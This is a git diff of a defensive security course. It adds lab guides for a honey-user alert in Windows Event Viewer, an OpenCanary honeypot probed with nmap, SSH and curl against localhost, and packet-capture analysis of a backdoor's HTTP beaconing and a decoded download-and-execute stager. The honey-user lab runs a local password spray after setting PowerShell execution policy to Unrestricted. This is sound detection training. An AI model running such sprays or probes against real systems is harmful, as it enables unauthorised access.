diff --git a/IntroClassFiles/Tools/IntroClass/honeyshare/attachment/Clipboard_2021-03-12-09-39-30.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/attachment/Clipboard_2021-03-12-09-39-30.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyshare/attachment/Clipboard_2021-03-12-09-39-30.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/attachment/Clipboard_2021-03-12-09-39-30.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyshare/attachment/Clipboard_2021-03-12-09-40-02.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/attachment/Clipboard_2021-03-12-09-40-02.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyshare/attachment/Clipboard_2021-03-12-09-40-02.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/attachment/Clipboard_2021-03-12-09-40-02.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyshare/attachment/Clipboard_2021-03-12-09-41-08.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/attachment/Clipboard_2021-03-12-09-41-08.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyshare/attachment/Clipboard_2021-03-12-09-41-08.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/attachment/Clipboard_2021-03-12-09-41-08.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyshare/attachment/Clipboard_2021-03-12-09-43-19.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/attachment/Clipboard_2021-03-12-09-43-19.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyshare/attachment/Clipboard_2021-03-12-09-43-19.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/attachment/Clipboard_2021-03-12-09-43-19.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyshare/attachment/Clipboard_2021-03-12-09-46-03.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/attachment/Clipboard_2021-03-12-09-46-03.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyshare/attachment/Clipboard_2021-03-12-09-46-03.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/attachment/Clipboard_2021-03-12-09-46-03.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyshare/attachment/Clipboard_2021-03-12-09-46-27.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/attachment/Clipboard_2021-03-12-09-46-27.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyshare/attachment/Clipboard_2021-03-12-09-46-27.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/attachment/Clipboard_2021-03-12-09-46-27.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyshare/attachment/Clipboard_2021-03-12-09-46-42.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/attachment/Clipboard_2021-03-12-09-46-42.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyshare/attachment/Clipboard_2021-03-12-09-46-42.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/attachment/Clipboard_2021-03-12-09-46-42.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyshare/attachment/Clipboard_2021-03-12-09-49-11.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/attachment/Clipboard_2021-03-12-09-49-11.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyshare/attachment/Clipboard_2021-03-12-09-49-11.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/attachment/Clipboard_2021-03-12-09-49-11.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-06-15.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-06-15.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-06-15.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-06-15.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-13-35.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-13-35.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-13-35.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-13-35.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-15-23.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-15-23.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-15-23.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-15-23.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-16-35.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-16-35.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-16-35.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-16-35.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-18-15.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-18-15.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-18-15.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-18-15.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-19-02.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-19-02.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-19-02.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-19-02.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-21-24.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-21-24.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-21-24.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-21-24.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-21-57.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-21-57.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-21-57.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-21-57.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-24-20.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-24-20.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-24-20.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-24-20.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-29-00.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-29-00.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-29-00.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-29-00.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-29-49.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-29-49.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-29-49.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-29-49.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-30-08.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-30-08.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-30-08.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-30-08.png
diff --git a/IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-32-18.png b/IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-32-18.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/honeyuser/attachment/Clipboard_2021-03-12-11-32-18.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/attachment/Clipboard_2021-03-12-11-32-18.png
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/honeyuser.md b/IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/honeyuser.md
new file mode 100644
index 00000000..b52ad312
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/honeyuser.md
@@ -0,0 +1,153 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+# Honey User 
+
+# Windows VM
+
+In this lab we will be setting up a poor persons SIEM with an "alert" generated whenever the **Honey Account Frank** is accessed. 
+
+Why Frank? 
+
+**Because.**
+
+Let's get started!
+
+- First, we will need to create the users and the Frank account. 
+
+- Let's open a command prompt:
+
+<img width="74" height="91" alt="image" src="https://github.com/user-attachments/assets/5b960092-421b-4d78-bce6-a504cf4a0559" />
+
+
+- Now, we will need to navigate to the C:\Tool directory and add the example users and Frank. 
+
+```bash
+cd \IntroLabs
+```
+
+```bash
+200-user-gen.bat  
+```
+
+- It should look like this: 
+
+<img width="385" height="482" alt="2026-03-26_09-21" src="https://github.com/user-attachments/assets/61c73044-6992-4bf9-b5af-2fe3ca08bab2" />
+
+- Now, we need to create the Custom View in **event viewer** to capture anytime someone logs in as Frank. 
+
+- To do this click the Windows Start button then type Event Viewer. 
+
+- It should look like this: 
+
+![](attachment/Clipboard_2021-03-12-11-16-35.png) 
+
+- When in the **Event Viewer**, select `Windows Logs` > `Security` then `Create Custom View` on the far-right hand side. 
+
+- It should look like this: 
+
+![](attachment/Clipboard_2021-03-12-11-18-15.png) 
+
+- When `Create Custom View` opens, please select **XML**: 
+
+![](attachment/Clipboard_2021-03-12-11-19-02.png) 
+
+- Then, select Edit query Manually, Press **Yes** on the **Alert Box** and then replace the text in the query with the text below: 
+
+~~~~~~ 
+<QueryList>
+  <Query Id="0" Path="Security">
+    <Select Path="Security">* [EventData[Data[@Name='TargetUserName']='Frank']]</Select>
+  </Query>
+</QueryList>
+
+~~~~~~
+
+- It should look like this: 
+
+![](attachment/Clipboard_2021-03-12-11-21-57.png) 
+
+- Now, press **OK**. 
+
+- When the Save Filter to Custom View box opens, name the filter Frank then press **OK**.
+
+- When we click on our **new View** we will see the Events associated with the **Frank Account** Being Created: 
+
+![](attachment/Clipboard_2021-03-12-11-24-20.png) 
+
+- Now, let's trip a few more. 
+
+- Back at your Windows Command Prompt 
+
+```bash
+cd \IntroLabs
+```
+
+```bash
+powershell
+```
+
+```bash
+Set-ExecutionPolicy Unrestricted
+```
+
+```bash
+Import-Module .\LocalPasswordSpray.ps1
+```
+
+- It should look like this: 
+
+<img width="815" height="179" alt="2026-03-26_09-22" src="https://github.com/user-attachments/assets/6cf93e86-6168-4c76-9512-c8f69352104f" />
+
+- Now, let’s try some **password spraying** against the local system! 
+
+```bash
+Invoke-LocalPasswordSpray -Password Winter2025
+```
+
+- It should look like this: 
+
+<img width="598" height="256" alt="2026-02-23_14-55" src="https://github.com/user-attachments/assets/0e299d08-daa9-498a-bb1b-2b95dd8d5c1e" />
+
+- Now we need to clean up and make sure the system is ready for the rest of the labs: 
+
+PS C:\Tools> `exit` 
+
+C:\Tools> `user-remove.bat` 
+
+<img width="365" height="285" alt="2026-02-23_15-02_1" src="https://github.com/user-attachments/assets/c82559fb-6c47-4c76-a306-498c572da9fb" />
+
+- Now, let's see if any **alerts** were generated. 
+
+- Go back to your **Event Viewer** and refresh (`Action` -> `Refresh`). 
+
+- You should see the **"Alerts"**! 
+
+![](attachment/Clipboard_2021-03-12-11-32-18.png) 
+
+- Just for a bit of reference.  We did this locally as an example of setting this up on a full SIEM.  We did it in less than 20 min.  Your SIEM team working with your AD Ops team should be able to pull this off. 
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/pcap/AdvancedC2PCAPAnalysis.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/HoneyShare.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
+
+  
+
+ 
+
+ 
+
+
+
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/openCanary.md b/IntroClassFiles/Tools/IntroClass/ADHD/openCanary.md
new file mode 100644
index 00000000..e5b02841
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/openCanary.md
@@ -0,0 +1,186 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+
+# For the Ubuntu VM
+
+
+# OpenCanary 
+
+**Goal:** Deploy a simple **OpenCanary** honeypot, trigger a few attacks (port scan, **SSH/SMB probe**, simple **HTTP request**), and observe **alerts**
+
+---
+
+# Setup
+
+- Install mysql client for the use in the lab
+
+```bash
+sudo apt install mysql-client-core-8.0
+```
+
+- Go to its directory
+
+```bash
+cd ~/ADCD/openCanary
+```
+
+- Activate the **Virtual Environment**
+```bash
+source env/bin/activate
+```
+
+### Create and edit the config
+Still inside your virtualenv:
+
+- Create the default config (this prints the location)
+```bash
+opencanaryd --copyconfig
+```
+
+<img width="1632" height="132" alt="img_01" src="https://github.com/user-attachments/assets/ab78d32a-f45d-4b5c-a811-4eaead4d0659" />
+
+- Make sure it is there
+
+```bash
+sudo ls -l /etc/opencanaryd/opencanary.conf
+```
+
+<img width="1147" height="57" alt="img_02" src="https://github.com/user-attachments/assets/34f5b53c-fa09-4d05-bf74-26d657e9e674" />
+
+- Now open the config and make small edits. Example uses `nano` (or `vi`):
+
+```bash
+sudo nano /etc/opencanaryd/opencanary.conf
+```
+
+- Inside the JSON config make these **minimal** changes to enable a few services and a log file:
+
+1. Locate the `"device.node_id"` and set a friendly name like `"opencanary-lab"`
+
+```
+"device.node_id": "opencanary-lab"
+```
+
+2. In the `"modules"` (or top-level service entries) enable the following:
+
+```json
+"ssh": {"enabled": true},
+"ssh": {"port": 222},
+"http": {"enabled": true},
+"http": {"port": 8082},
+"ftp": {"enabled": true},
+"mysql": {"enabled": true},
+"mysql": {"log_connection_made": true},
+"telnet": {"enabled": true},
+"portscan": {"enabled": true}
+```
+
+<img width="1200" height="722" alt="img_03" src="https://github.com/user-attachments/assets/4c648111-5328-4265-8d85-3ba704708235" />
+<img width="1170" height="495" alt="img_04" src="https://github.com/user-attachments/assets/5e51e170-1986-4411-8b6f-c04c3598969f" />
+<img width="1172" height="217" alt="img_05" src="https://github.com/user-attachments/assets/2e846bd7-02eb-478f-a6a6-96ba86691c77" />
+
+
+- Save and exit with `Ctrl + x` and `y` and `Enter`
+
+
+---
+
+## Start
+
+- Run it
+
+>[!NOTE]
+> Make sure you are in **~/ADCD/openCanary** with **venv** activated
+
+```bash
+opencanaryd --start
+# To stop:
+opencanaryd --stop
+```
+
+<img width="1898" height="541" alt="img_06" src="https://github.com/user-attachments/assets/9ad67aff-2d3f-429f-aebd-805a0e682931" />
+
+
+- If you configured file logging as above, check the log:
+
+```bash
+sudo tail -n 50 /var/tmp/opencanary.log
+```
+
+<img width="1900" height="337" alt="img_07" src="https://github.com/user-attachments/assets/71514b52-d90a-4bd4-a1ed-c7a28429274a" />
+
+
+---
+
+## Simple attacker 
+Perform these actions from a second terminal (or another device on the same network). Replace `<CANARY_IP>` with the IP address of the VM.
+
+1. Port scan (nmap)
+```bash
+sudo nmap -sV -sC -Pn -p 21,23,222,3306,8082 localhost
+```
+
+<img width="1897" height="721" alt="img_08" src="https://github.com/user-attachments/assets/be1e0a45-96b4-4eb5-aa50-46fee364392e" />
+
+
+- **OpenCanary's** `portscan` module should flag the scan, so let's check!
+
+```bash
+sudo tail -n 50 /var/tmp/opencanary.log
+```
+
+<img width="1901" height="773" alt="img_09" src="https://github.com/user-attachments/assets/3168032c-c6f3-43c0-a010-b4248dfb0297" />
+
+
+BOOM!
+
+2. SSH probe (attempt to connect)
+```bash
+ssh fakeuser@localhost -p 222
+```
+This triggers the `ssh` canary
+
+3. HTTP request
+```bash
+curl http://127.0.0.1:8082/index.html
+```
+This triggers the `http` canary logs
+
+4. MySQL login attempt
+```bash
+mysql -h 127.0.0.1 -u root -p
+```
+
+5. FTP login attempt
+```bash
+ftp 127.0.0.1
+```
+
+6. TELNET login attempt
+```bash
+telnet 127.0.0.1
+```
+
+- After each action, check the canary log or journal on the honeypot host to see alerts:
+
+```bash
+sudo tail -n 50 /var/tmp/opencanary.log
+```
+
+<img width="1897" height="452" alt="img_10" src="https://github.com/user-attachments/assets/e7c925b3-2e28-4b7b-80a8-2a493e94078e" />
+
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/Beelzebub.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/pcap/AdvancedC2PCAPAnalysis.md b/IntroClassFiles/Tools/IntroClass/ADHD/pcap/AdvancedC2PCAPAnalysis.md
new file mode 100644
index 00000000..3089c8f4
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/pcap/AdvancedC2PCAPAnalysis.md
@@ -0,0 +1,147 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+ 
+
+# Advanced C2 PCAP Analysis - vsagent HTTP Beaconing
+
+# Ubuntu VM
+
+- First, we will need to open the Ubuntu Terminal
+
+- Now, we should move to the proper directory
+
+```bash
+cd /ADCD/advancedC2
+```
+
+- Let's run a tcpdump command to do an initial review of the capture
+
+```bash
+sudo tcpdump -nA -r vsagent_c2.pcap | less
+```
+
+- The `-nA` option tells tcpdump not to resolve names (`n`) and print the ASCII text of the packet (`A`). You are reading in a file with the `-r` option and piping the data (`|`) through `less` so you can view it section by section
+
+<img width="1291" height="836" alt="2026-03-12_11-43" src="https://github.com/user-attachments/assets/9bde375a-2e1a-4378-9c93-97f1e62f8812" />
+
+
+- Hit spacebar to page through the output. Look for HTTP traffic - you will see `GET /beacon`, `POST /beacon`, and response bodies mixed in with ARP, DNS, and NTP background noise
+
+- Press `q` to close the tcpdump session
+
+- One of the interesting things about many malware specimens we review is how they "wait" for the attacker to communicate with them. In this sample, the **vsagent** backdoor **beacons** out every 30 seconds
+
+- This is for two reasons. One is because the attacker might not be at a system waiting for a command shell. Secondly, because long-term established sessions tend to attract attention - with HTTP, sessions are generally short burst connections. vsagent is designed to mimic that behaviour
+
+- In the capture, the **SYN** packets are roughly 30 seconds apart for the beacon traffic
+
+- To see the SYN packets, simply run the following command:
+
+```bash
+sudo tcpdump -r vsagent_c2.pcap 'tcp[13] = 0x02'
+```
+
+<img width="1019" height="195" alt="2026-03-12_11-45" src="https://github.com/user-attachments/assets/83857c94-a957-4357-9722-32fc6052b6c4" />
+
+
+- This filter shows all packets with the SYN bit (`0x02`) set in the 13th byte offset of the TCP header (`tcp[13]`)
+
+- Note the time difference between packets. You can see they are almost all 30 seconds apart for each beacon cycle
+
+- Now, let's identify the **User-Agent** string the implant is using
+
+```bash
+sudo tcpdump -nA -r vsagent_c2.pcap | grep -i "user-agent"
+```
+
+<img width="1006" height="176" alt="2026-03-12_11-47" src="https://github.com/user-attachments/assets/508c947b-a1e1-412b-a1da-0db06e2b7fb0" />
+
+
+- You will see two kinds of User-Agent strings - one long `Mozilla/5.0` string from background noise, and the short `vsagent/1.0` string repeating on every beacon connection. A hardcoded, non-browser User-Agent appearing every 30 seconds is a strong indicator of implant traffic
+
+- Run the following command to isolate all HTTP GET beacons:
+
+```bash
+sudo tcpdump -nA -r vsagent_c2.pcap | grep "GET /beacon"
+```
+
+- It should look like this:
+
+<img width="1323" height="264" alt="2026-03-12_12-05" src="https://github.com/user-attachments/assets/80d51d0a-6696-441b-a472-a6537fbf2245" />
+
+- Notice the fixed URI path `/beacon` across every request, the absence of `Referer` and `Accept-Encoding` headers, and no cookies - all hallmarks of an implant rather than a browser
+
+- Now let's look for commands delivered by the C2 server:
+
+```bash
+sudo tcpdump -nA -r vsagent_c2.pcap | grep -i "cmd="
+```
+
+<img width="1129" height="154" alt="2026-03-12_12-21" src="https://github.com/user-attachments/assets/a81307a3-1b9f-4e2b-8223-530a5d778378" />
+
+
+- You should see a number of returned lines. Some will show just `cmd=` with nothing after it - those are idle check-ins. At least one will show `cmd=` followed by what appears to be random data ending with an `=` sign. That trailing `=` padding is a strong indicator the data is **Base64** encoded
+
+- Does this mean it is evil? Not necessarily. It just means it is interesting
+
+- You can quickly prove or disprove this by using Python to decode the data. If it is Base64, it will decode cleanly to ASCII. If not, you will keep looking
+
+- Next, look for the exfiltration traffic:
+
+```bash
+sudo tcpdump -nA -r vsagent_c2.pcap | grep "POST"
+```
+
+<img width="1335" height="88" alt="2026-03-12_12-22" src="https://github.com/user-attachments/assets/837b9fcf-dfd9-4408-b8ca-a93910870ac2" />
+
+
+- You will see a `POST /beacon` request - the implant shipping stolen data back to the operator using the same URI path it uses for check-ins
+
+- Run the following to see the exfiltrated data blob:
+
+```bash
+sudo tcpdump -nA -r vsagent_c2.pcap | grep "output="
+```
+
+<img width="1903" height="112" alt="2026-03-12_12-23" src="https://github.com/user-attachments/assets/aa7638b6-10d8-4b76-8300-499e7ff025d5" />
+
+
+- You should see `output=` followed by a Base64 encoded blob - larger than the `cmd=` strings, because task output is typically much longer than the command that produced it
+
+- Now for the fun part. Let's decode the C2 command. Take the Base64 string you found after `cmd=` in the tasked response and run:
+
+```bash
+python3 -c "import base64; print(base64.b64decode('<paste_base64_here>').decode())"
+```
+
+<img width="1904" height="290" alt="2026-03-12_12-27" src="https://github.com/user-attachments/assets/5bc0a493-fe8c-4dba-8cc1-e74c51e289e1" />
+
+
+- When you do this, you will quickly see that the **Base64** encoded data is a PowerShell command to download and execute a remote script - a classic stager that pulls a second-stage payload into memory without writing it to disk
+
+- Now decode the exfiltrated output blob the same way. Take the Base64 string after `output=` and run:
+
+```bash
+python3 -c "import base64; print(base64.b64decode('<paste_base64_here>').decode())"
+```
+
+- It should look like this:
+
+<img width="1901" height="315" alt="2026-03-12_12-25" src="https://github.com/user-attachments/assets/52d6caf0-07bc-461e-81cc-7bb90ec79fa5" />
+
+- You can now see exactly what data the implant shipped to the operator - in this case a `whoami` result and a directory listing of the user's Documents folder
+
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/webhoneypot.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHDhoneyuser/honeyuser.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
diff --git a/IntroClassFiles/Tools/IntroClass/pcap/attachment/Clipboard_2021-03-12-08-31-27.png b/IntroClassFiles/Tools/IntroClass/ADHD/pcap/attachment/Clipboard_2021-03-12-08-31-27.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/pcap/attachment/Clipboard_2021-03-12-08-31-27.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/pcap/attachment/Clipboard_2021-03-12-08-31-27.png
diff --git a/IntroClassFiles/Tools/IntroClass/pcap/attachment/Clipboard_2021-03-12-08-32-16.png b/IntroClassFiles/Tools/IntroClass/ADHD/pcap/attachment/Clipboard_2021-03-12-08-32-16.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/pcap/attachment/Clipboard_2021-03-12-08-32-16.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/pcap/attachment/Clipboard_2021-03-12-08-32-16.png
diff --git a/IntroClassFiles/Tools/IntroClass/pcap/attachment/Clipboard_2021-03-12-08-34-02.png b/IntroClassFiles/Tools/IntroClass/ADHD/pcap/attachment/Clipboard_2021-03-12-08-34-02.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/pcap/attachment/Clipboard_2021-03-12-08-34-02.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/pcap/attachment/Clipboard_2021-03-12-08-34-02.png
diff --git a/IntroClassFiles/Tools/IntroClass/pcap/attachment/Clipboard_2021-03-12-08-36-57.png b/IntroClassFiles/Tools/IntroClass/ADHD/pcap/attachment/Clipboard_2021-03-12-08-36-57.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/pcap/attachment/Clipboard_2021-03-12-08-36-57.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/pcap/attachment/Clipboard_2021-03-12-08-36-57.png
diff --git a/IntroClassFiles/Tools/IntroClass/pcap/attachment/Clipboard_2021-03-12-08-38-24.png b/IntroClassFiles/Tools/IntroClass/ADHD/pcap/attachment/Clipboard_2021-03-12-08-38-24.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/pcap/attachment/Clipboard_2021-03-12-08-38-24.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/pcap/attachment/Clipboard_2021-03-12-08-38-24.png
diff --git a/IntroClassFiles/Tools/IntroClass/pcap/attachment/Clipboard_2021-03-12-08-41-41.png b/IntroClassFiles/Tools/IntroClass/ADHD/pcap/attachment/Clipboard_2021-03-12-08-41-41.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/pcap/attachment/Clipboard_2021-03-12-08-41-41.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/pcap/attachment/Clipboard_2021-03-12-08-41-41.png
diff --git a/IntroClassFiles/Tools/IntroClass/pcap/attachment/Clipboard_2021-03-12-08-43-28.png b/IntroClassFiles/Tools/IntroClass/ADHD/pcap/attachment/Clipboard_2021-03-12-08-43-28.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/pcap/attachment/Clipboard_2021-03-12-08-43-28.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/pcap/attachment/Clipboard_2021-03-12-08-43-28.png
diff --git a/IntroClassFiles/Tools/IntroClass/pcap/attachment/Clipboard_2021-03-12-08-46-15.png b/IntroClassFiles/Tools/IntroClass/ADHD/pcap/attachment/Clipboard_2021-03-12-08-46-15.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/pcap/attachment/Clipboard_2021-03-12-08-46-15.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/pcap/attachment/Clipboard_2021-03-12-08-46-15.png
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/pcap/vsagent_c2.pcap b/IntroClassFiles/Tools/IntroClass/ADHD/pcap/vsagent_c2.pcap
new file mode 100644
index 00000000..a5827362
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/pcap/vsagent_c2.pcap differ
diff --git a/IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-39-25.png b/IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-39-25.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-39-25.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-39-25.png
diff --git a/IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-40-15.png b/IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-40-15.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-40-15.png
